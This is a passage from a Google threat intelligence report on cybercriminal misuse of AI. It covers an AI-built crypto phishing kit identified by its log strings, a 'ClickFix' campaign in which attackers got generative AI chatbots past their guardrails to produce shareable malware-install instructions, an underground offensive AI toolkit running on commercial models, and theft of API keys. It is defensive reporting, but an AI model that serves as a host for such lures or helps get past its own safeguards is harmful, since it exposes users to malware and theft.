• The phishing kit was wrapped in a full React Single-Page Application (SPA) with complex state management and routing. This complexity is indicative of code generated from high-level prompts (e.g., "Create a Coinbase-style UI for wallet recovery") using a framework like Lovable AI. 

• Another key indicator of LLM use is the presence of verbose, developer-oriented logging messages directly within the malware's source code. These messages—consistently prefixed with "? Analytics:"—provide a real-time trace of the kit's malicious tracking and data exfiltration activities and serve as a unique fingerprint for this code family.

Phase	Log Message Examples
Initialization	? Analytics: Initializing...
	? Analytics: Session created in database:
Credential Capture	? Analytics: Tracking password attempt:
	? Analytics: Password attempt tracked to database:
Admin Panel Fetching	? RecoveryPhrasesCard: Fetching recovery phrases directly from database...
Routing/Access Control	? RouteGuard: Admin redirected session, allowing free access to
	? RouteGuard: Session approved by admin, allowing free access to
Error Handling	? Analytics: Database error for password attempt:

Table 2: Example console.log messages extracted from COINBAIT source code

We also observed the group employ infrastructure and evasion tactics for their operations, including proxying phishing domains through Cloudflare to obscure the attacker IP addresses and  hotlinking image assets in phishing pages directly from Lovable AI. 

The introduction of the COINBAIT phishing kit would represent an evolution in UNC5356's tooling, demonstrating a shift toward modern web frameworks and legitimate cloud services to enhance the sophistication and scalability of their social engineering campaigns. However, there is at least some evidence to suggest that COINBAIT may be a service provided to multiple disparate threat actors.

Mitigations

Organizations should strongly consider implementing network detection rules to alert on traffic to backend-as-a-service (BaaS) platforms like Supabase that originate from uncategorized or newly registered domains. Additionally, organizations should consider enhancing security awareness training to warn users against entering sensitive data into website forms. This includes passwords, multifactor authentication (MFA) backup codes, and account recovery keys.

Cyber Crime Use of AI Tooling

In addition to misusing existing AI-enabled tools and services across the industry, there is a growing interest and marketplace for AI tools and services purpose-built to enable illicit activities. Tools and services offered via underground forums can enable low-level actors to augment the frequency, scope, efficacy, and complexity of their intrusions despite their limited technical acumen and financial resources. While financially motivated threat actors continue experimenting, they have not yet made breakthroughs in developing AI tooling. 

Threat Actors Leveraging AI Services for Social Engineering in 'ClickFix' Campaigns

While not a new malware technique, GTIG observed instances in which threat actors abused the public's trust in generative AI services to attempt to deliver malware. GTIG identified a novel campaign where threat actors are leveraging the public sharing feature of generative AI services, including Gemini, to host deceptive social engineering content. This activity, first observed in early December 2025, attempts to trick users into installing malware via the well-established "ClickFix" technique. This ClickFix technique is used to socially engineer users to copy and paste a malicious command into the command terminal.

The threat actors were able to bypass safety guardrails to stage malicious instructions on how to perform a variety of tasks on macOS, ultimately distributing variants of ATOMIC, an information stealer that targets the macOS environment and has the ability to collect browser data, cryptocurrency wallets, system information, and files in the Desktop and Documents folders. The threat actors behind this campaign have used a wide range of AI chat platforms to host their malicious instructions, including ChatGPT, CoPilot, DeepSeek, Gemini, and Grok.

The campaign's objective is to lure users, primarily those on Windows and macOS systems, into manually executing malicious commands. The attack chain operates as follows:

• A threat actor first crafts a malicious command line that, if copied and pasted by a victim, would infect them with malware.

• Next, the threat actor manipulates the AI to create realistic-looking instructions to fix a common computer issue (e.g., clearing disk space or installing software), but gives the malicious command line to the AI as the solution.

• Gemini and other AI tools allow a user to create a shareable link to specific chat transcripts so a specific AI response can be shared with others. The attacker now has a link to a malicious ClickFix landing page hosted on the AI service's infrastructure.

• The attacker purchases malicious advertisements or otherwise directs unsuspecting victims to the publicly shared chat transcript.

• The victim is fooled by the AI chat transcript and follows the instructions to copy a seemingly legitimate command-line script and paste it directly into their system's terminal. This command will download and install malware. Since the action is user initiated and uses built-in system commands, it may be harder for security software to detect and block.

Figure 12: ClickFix attack chain

There were different lures generated for Windows and MacOS, and the use of malicious advertising techniques for payload distribution suggests the targeting is likely fairly broad and opportunistic. 

This approach allows threat actors to leverage trusted domains to host their initial stage of instruction, relying on social engineering to carry out the final, highly destructive step of execution. While a widely used approach, this marks the first time GTIG observed the public sharing feature of AI services being abused as trusted domains.

Mitigations

In partnership with Ads and Safe Browsing, GTIG is taking actions to both block the malicious content and restrict the ability to promote these types of AI-generated responses.

Observations from the Underground Marketplace: Threat Actors Abusing AI API Keys

While legitimate AI services remain popular tools for threat actors, there is an enduring market for AI services specifically designed to support malicious activity. Current observations of English- and Russian-language underground forums indicates there is a persistent appetite for AI-enabled tools and services, which aligns with our previous assessment of these platforms. 

However, threat actors struggle to develop custom models and instead rely on mature models such as Gemini. For example, "Xanthorox" is an underground toolkit that advertises itself as a custom AI for cyber offensive purposes, such as autonomous code generation of malware and development of phishing campaigns. The model was advertised as a "bespoke, privacy preserving self-hosted AI" designed to autonomously generate malware, ransomware, and phishing content. However, our investigation revealed that Xanthorox is not a custom AI but actually powered by several third-party and commercial AI products, including Gemini.

This setup leverages a key abuse vector: the integration of multiple open-source AI products—specifically Crush, Hexstrike AI, LibreChat-AI, and Open WebUI—opportunistically leveraged via Model Context Protocol (MCP) servers to build an agentic AI service upon commercial models.

In order to misuse LLMs services for malicious operations in a scalable way, threat actors need API keys and resources that enable LLM integrations. This creates a hijacking risk for organizations with substantial cloud resources and AI resources. 

In addition, vulnerable open-source AI tools are commonly exploited to steal AI API keys from users, thus facilitating a thriving black market for unauthorized API resale and key hijacking, enabling widespread abuse, and incurring costs for the affected users. For example, the One API and New API platform, popular with users facing country-level censorship, are regularly harvested for API keys by attackers, exploiting publicly known vulnerabilities such as default credentials, insecure authentication, lack of rate limiting, XSS flaws, and API key exposure via insecure API endpoints.

Mitigations

The activity was identified and successfully mitigated. Google Trust & Safety took action to disable and mitigate all identified accounts and AI Studio projects associated with Xanthorox. These observations also underscore a broader security risk where vulnerable open-source AI tools are actively exploited to steal users' AI API keys, thus facilitating a black market for unauthorized API resale and key hijacking, enabling widespread abuse, and incurring costs for the affected users.

Building AI Safely and Responsibly 

We believe our approach to AI must be both bold and responsible. That means developing AI in a way that maximizes the positive benefits to society while addressing the challenges. Guided by our AI Principles, Google designs AI systems with robust security measures and strong safety guardrails, and we continuously test the security and safety of our models to improve them. 

Our policy guidelines and prohibited use policies prioritize safety and responsible use of Google's generative AI tools. Google's policy development process includes identifying emerging trends, thinking end-to-end, and designing for safety. We continuously enhance safeguards in our products to offer scaled protections to users across the globe.  

At Google, we leverage threat intelligence to disrupt adversary operations. We investigate abuse of our products, services, users, and platforms, including malicious cyber activities by government-backed threat actors, and work with law enforcement when appropriate. Moreover, our learnings from countering malicious activities are fed back into our product development to improve safety and security for our AI models. These changes, which can be made to both our classifiers and at the model level, are essential to maintaining agility in our defenses and preventing further misuse.

Google DeepMind also develops threat models for generative AI to identify potential vulnerabilities and creates new evaluation and training techniques to address misuse. In conjunction with this research, Google DeepMind has shared how they're actively deploying defenses in AI systems, along with measurement and monitoring tools, including a robust evaluation framework that can automatically red team an AI vulnerability to indirect prompt injection attacks. 

Our AI development and Trust & Safety teams also work closely with our threat intelligence, security, and modelling teams to stem misuse.

The potential of AI, especially generative AI, is immense. As innovation moves forward, the industry needs security standards for building and deploying AI responsibly. That's why we introduced the Secure AI Framework (SAIF), a conceptual framework to secure AI systems. We've shared a comprehensive toolkit for developers with resources and guidance for designing, building, and evaluating AI models responsibly. We've also shared best practices for implementing safeguards, evaluating model safety, red teaming to test and secure AI systems, and our comprehensive prompt injection approach.

Working closely with industry partners is crucial to building stronger protections for all of our users. To that end, we're fortunate to have strong collaborative partnerships with numerous researchers, and we appreciate the work of these researchers and others in the community to help us red team and refine our defenses.

Google also continuously invests in AI research, helping to ensure AI is built responsibly, and that we're leveraging its potential to automatically find risks. Last year, we introduced Big Sleep, an AI agent developed by Google DeepMind and Google Project Zero, that actively searches and finds unknown security vulnerabilities in software. Big Sleep has since found its first real-world security vulnerability and assisted in finding a vulnerability that was imminently going to be used by threat actors, which GTIG was able to cut off beforehand. We're also experimenting with AI to not only find vulnerabilities, but also patch them. We recently introduced CodeMender, an experimental AI-powered agent using the advanced reasoning capabilities of our Gemini models to automatically fix critical code vulnerabilities. 

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.

About the Authors

Google Threat Intelligence Group focuses on identifying, analyzing, mitigating, and eliminating entire classes of cyber threats against Alphabet, our users, and our customers. Our work includes countering threats from government-backed actors, targeted zero-day exploits, coordinated information operations (IO), and serious cyber crime networks. We apply our intelligence to improve Google's defenses and protect our users and customers.

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